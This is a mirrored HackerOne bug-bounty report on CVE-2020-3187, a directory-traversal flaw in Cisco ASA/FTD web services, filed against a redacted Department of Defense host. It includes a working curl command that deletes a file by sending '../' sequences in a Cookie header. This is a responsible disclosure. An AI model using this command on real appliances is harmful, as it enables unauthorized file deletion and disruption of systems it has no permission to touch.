Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneGrimnirH1:960330
HistoryAug 17, 2020 - 11:21 a.m.

U.S. Dept Of Defense: CVE-2020-3187 - Unauthenticated Arbitrary File Deletion

2020-08-1711:21:28
grimnir
hackerone.com
690

0.973 High

EPSS

Percentile

99.9%

JSON

Summary:

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences.

Vulnerable Endpoint

https://โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ/+CSCOE+/session_password.html

Impact

An exploit could allow the attacker to view or delete arbitrary files on the targeted system. When the device is reloaded after exploitation of this vulnerability, any files that were deleted are restored. The attacker can only view and delete files within the web services file system. This file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability can not be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. Reloading the affected device will restore all files within the web services file system.

Step-by-step Reproduction Instructions

1.First I performed a curl request to validate that /session_password.html gave a 200 response.

 curl -k -s -i https://โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ/+CSCOE+/session_password.html

2.Example to delete logo file โ€œ/+CSCOU+/csco_logo.gifโ€.

 curl -k -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ/+CSCOE+/session_password.html

NOTE: No destructive behavior was performed on target, the above command will remove csco_logo.gif and can be restored on reboot of the device

Suggested Mitigation/Remediation Actions

Upgrade to the latest version of Cisco ASA or Cisco FTD.

Impact

CVSS Score: Base 9.1
Vector: CVSS:3.0/CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:X/RL:X/RC:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MPR:X/MUI:X/MS:X/MC:X/MI:X/MA:X

An unauthenticated, remote attacker can delete sensitive files located inside the webroot directory.

Related

cve 1
cisco 1
nuclei 1
hackerone 10
prion 1
nvd 1
ptsecurity 1
checkpoint_advisories 1
nessus 2
githubexploit 1
cvelist 1
zdt 1
attackerkb 3
packetstorm 1
exploitdb 1
threatpost 1
cve
cve
CVE-2020-3187
2020-05-06 17:15:12
cisco
cisco
Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Path Traversal Vulnerability
2020-05-06 16:00:00
nuclei
nuclei
Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal
2020-07-25 01:53:21
hackerone
hackerone
U.S. Dept Of Defense: https://โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ vulnerable to CVE-2020-3187 - Unauthenticated arbitrary file deletion in Cisco ASA/FTD
2020-11-11 09:18:46
U.S. Dept Of Defense: Unauthenticated Arbitrary File Deletion "CVE-2020-3187" in โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ
2020-11-04 22:22:37
U.S. Dept Of Defense: CVE-2020-3187 - Unauthenticated Arbitrary File Deletion
2022-04-29 22:55:24
prion
prion
Directory traversal
2020-05-06 17:15:00
nvd
nvd
CVE-2020-3187
2020-05-06 17:15:12
ptsecurity
ptsecurity
PT-2020-02: Reading or deleting arbitrary files in Cisco ASA and Cisco FTD
2019-04-10 00:00:00
checkpoint_advisories
checkpoint_advisories
Cisco Firepower Threat Defense Directory Traversal (CVE-2020-3187)
2020-08-17 00:00:00
nessus
nessus
Cisco Adaptive Security Appliance Software Web Services Path Traversal (cisco-sa-asaftd-path-JE3azWw43)
2020-05-27 00:00:00
Cisco Firepower Threat Defense Software Web Services Path Traversal (cisco-sa-asaftd-path-JE3azWw43)
2020-05-27 00:00:00
githubexploit
githubexploit
Exploit for Path Traversal in Cisco Firepower Threat Defense
2021-06-14 06:27:11
cvelist
cvelist
CVE-2020-3187 Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Path Traversal Vulnerability
2020-05-06 00:00:00
zdt
zdt
Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion Exploit
2020-07-30 00:00:00
attackerkb
attackerkb
CVE-2020-3187
2020-05-06 00:00:00
CVE-2020-3580
2020-10-21 00:00:00
CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability
2020-07-22 00:00:00
packetstorm
packetstorm
Cisco Adaptive Security Appliance Software 9.7 Arbitrary File Deletion
2020-07-29 00:00:00
exploitdb
exploitdb
Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion
2020-07-29 00:00:00
threatpost
threatpost
Cisco Fixes High-Severity Flaws In Firepower Security Software, ASA
2020-05-07 18:43:04

0.973 High

EPSS

Percentile

99.9%

JSON
Related for H1:960330
cve1cisco1nuclei1hackerone10prion1nvd1ptsecurity1checkpoint_advisories1nessus2githubexploit1cvelist1zdt1attackerkb3packetstorm1exploitdb1threatpost1